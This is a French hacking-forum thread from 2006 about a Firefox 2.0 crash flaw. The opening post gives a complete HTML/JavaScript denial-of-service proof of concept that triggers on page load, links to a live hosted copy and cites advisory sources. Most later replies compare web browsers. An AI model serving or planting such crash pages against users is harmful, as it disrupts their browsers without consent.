logo Homepage
+  NewbieContest
|-+  News» News Hacking/Cracking/Phreaking» Faille critique FF2.0
Username:
Password:
Pages: [1] 2
  Imprimer  
Auteur Fil de discussion: Faille critique FF2.0  (Lu 10384 fois)
Folcan

Profil challenge

Classement : 508/54279

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1520


Voir le profil
« le: 01 Novembre 2006 à 23:51:50 »

Bsoir,

Alors la faille se nomme : Firefox createRange Crash (Exploit)

Et elle fonctionne plutot bien : http://folcan.nix3.fr/exploit/death.html

Et le tout, avec quelques lignes de javascript :

Citation
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
 <head>
  <script type="text/javascript">
   function do_crash()
   {
    var range;
    range = document.createRange();
    range.selectNode(document.firstChild);
    range.createContextualFragment('<span></span>');
   }
  </script>
 </head>
 <body onload="do_crash()">
  <p>Good bye Firefox!</p>
 </body>
</html>
Voilou, notons qu'apparement il existe la meme pour IE basé sur un DoS, mais pas reussi à m'en servir...

(source : http://www.securiteam.com/exploits/6H00W0AH5E.html)

PS : rooo le con, j'ai cliqué sur le lien, ca ma shooter FF, heureusement que la 2.0 possède la restauration de session !! Et je viens de decouvrir avec joie, que en plus de restaurer FF, il restaure les onglet, les multi-browserage, et aussi les champs de formulaire, donc mon message, il est resté . Marche nikel ce truc !

++
Journalisée

-=[FoLc@N]=-

Citation :
* Le futur appartient à ceux qui croient à la beauté de leurs rêves, je crois au miens, NewbieContest aura un bon futur.
* Il y'a seulement 10 categories de gens dans la vie : ceux qui comprennent le binaire, et les autres.
offw0rld

Profil challenge

Classement : 122/54279

Membre Complet
***
Hors ligne Hors ligne
Messages: 127


Voir le profil
« #1 le: 02 Novembre 2006 à 18:05:04 »

Quelle idée d'activer par défault le jvs.

Je sais Mr_kaliman, tu vas me dire qu'il suffit de ne pas allumer son pc
Journalisée
Invit
Invité
« #2 le: 02 Novembre 2006 à 18:08:01 »

Pis en soit un DoS sur un navigateur c'est pas ce que j'appellerait une faille "critique"
Journalisée
shiroko
Profil challenge

Classement : 12205/54279

Membre Complet
***
Hors ligne Hors ligne
Messages: 115


Voir le profil
« #3 le: 02 Novembre 2006 à 22:27:32 »

+1 car tu redemarre FF et il te demande si tu veux reprendre ton ancienne session

Mais merci pour la news
Journalisée
zours

Profil challenge

Classement : 552/54279

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #4 le: 02 Novembre 2006 à 22:39:53 »

De toute façon, je pars quand même du principe que Firefox est mieux. Ouais, je le trouve plus stable. Mais c'est pas tout. Thèmes et extensions. IE n'a pas ça (surtout la pléthore d'extensions dont dispose FF).
Journalisée
Invit
Invité
« #5 le: 03 Novembre 2006 à 04:06:05 »

Citation
[...]
Vulnerable : 1.5.0.7 and below, 2.0
Risk       : Moderate
Impact     : Denial of Services (Code execution not verified)
[...]
http://www.milw0rm.com/exploits/2695
Journalisée
Ewilan

Profil challenge

Classement : 7159/54279

Néophyte
*
Hors ligne Hors ligne
Messages: 31


Voir le profil
« #6 le: 03 Novembre 2006 à 09:34:28 »

pas mal...
et toujours pas de correction pour ça ?

Entre IE et FF, je reste sous FF, mais il faut avouer que IE7 n'est pas si mal...
Journalisée

Avance !
Avance sans t'arreter, sans te retourner !
Si tu recules, tu rouilleras, si tu as peur, tu mourras !
zours

Profil challenge

Classement : 552/54279

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #7 le: 03 Novembre 2006 à 11:43:56 »

Disons qu'ils ont fait des progrès.
Mais bon, vu le temps passé pendant lequel il n'y a eu aucune évolution, je prends ça comme un dû, et donc hors de question de les acclamer pour ça.
Journalisée
Gardel

Profil challenge

Classement : 669/54279

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1012


Voir le profil
« #8 le: 03 Novembre 2006 à 13:39:08 »

Bien qu'ils aient rendu moins pire IE, il faut tout de même conserver à l'esprit que IE ne respecte toujours pas toutes les normes du W3C hein.

Et puis Firefox, c'est du libre, c'est du bon.

Arrêtez donc de comparer Firefox à IE, on ne mélange pas les tampons et les serviettes !
Journalisée

Selon le postulat que les filles, c'est du temps accordé et de l'argent dépensé : Filles = Temps . Argent
Et comme chacun le sait, "le temps c'est de l'argent", donc : Temps = Argent
Par conséquent : Filles = Argent . Argent
Et parce que, "l'argent est la racine du mal" : Argent = sqrt(Mal)
On en déduit que : Filles = sqrt(Mal).sqrt(Mal)
Force est de constater que : Filles = Mal
shiroko
Profil challenge

Classement : 12205/54279

Membre Complet
***
Hors ligne Hors ligne
Messages: 115


Voir le profil
« #9 le: 03 Novembre 2006 à 16:44:07 »

Ba nan IE c'est comme FF au même titre que Linux = Windows !!

Rhoooo vous n'avez encore rien compris hein

Ok je ==> []
Journalisée
BuRner

Profil challenge

Classement : 399/54279

Membre Junior
**
Hors ligne Hors ligne
Messages: 75


Voir le profil
« #10 le: 07 Novembre 2006 à 16:20:42 »

Personne ne parle d'Opera ?

Je l'ai testé après avoir testé firefox et je l'ai adopté directement.
Plus de plantage intempestif (FF) plus d'utilisation de RAM excédentaire, et une rapidité de démarrage plus que satisfaisante.

J'ai donc cherché un peu et j'ai trouvé mon bonheur dans Opera, qui ne possède aucun de ces défauts.
Enfin bref moi je vous conseil de le tester voir ce que ça donne, ça coute rien après tout

Bonne journée
Journalisée
Nebelmann

Profil challenge

Classement : 462/54279

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1357


Voir le profil
« #11 le: 07 Novembre 2006 à 16:44:57 »

Le seul souci d'opéra est qu'il est gratuit mais pas open source...
A part çà, il replace effectivement très bien Internet Explorer !
Journalisée

-- Nebelmann -- Registered linux user #429186
«Si les lecteurs étaient des compilateurs, les posteurs feraient peut-être davantage attention à ce qu'ils écrivent...»
Folcan

Profil challenge

Classement : 508/54279

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1520


Voir le profil
« #12 le: 08 Novembre 2006 à 00:10:37 »

Il est pluginable ?
Journalisée

-=[FoLc@N]=-

Citation :
* Le futur appartient à ceux qui croient à la beauté de leurs rêves, je crois au miens, NewbieContest aura un bon futur.
* Il y'a seulement 10 categories de gens dans la vie : ceux qui comprennent le binaire, et les autres.
zours

Profil challenge

Classement : 552/54279

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #13 le: 08 Novembre 2006 à 05:30:32 »

Citation de: Folcan
Il est pluginable ?
Je crois pas. Enfin même au cas où, aucun navigateur n'a pour l'instant la richesse de ceux de Firefox. Ca me fait parfois un peu chier, j'avoue, parce que certains plus sont sympas, mais bon...
Journalisée
shiroko
Profil challenge

Classement : 12205/54279

Membre Complet
***
Hors ligne Hors ligne
Messages: 115


Voir le profil
« #14 le: 08 Novembre 2006 à 13:29:20 »

Non folcan, je n'ai jamais entendu dire qu'il y avait de plugin ... FF a le monopole du plugin
Journalisée
Pages: [1] 2
  Imprimer  
 
Aller à: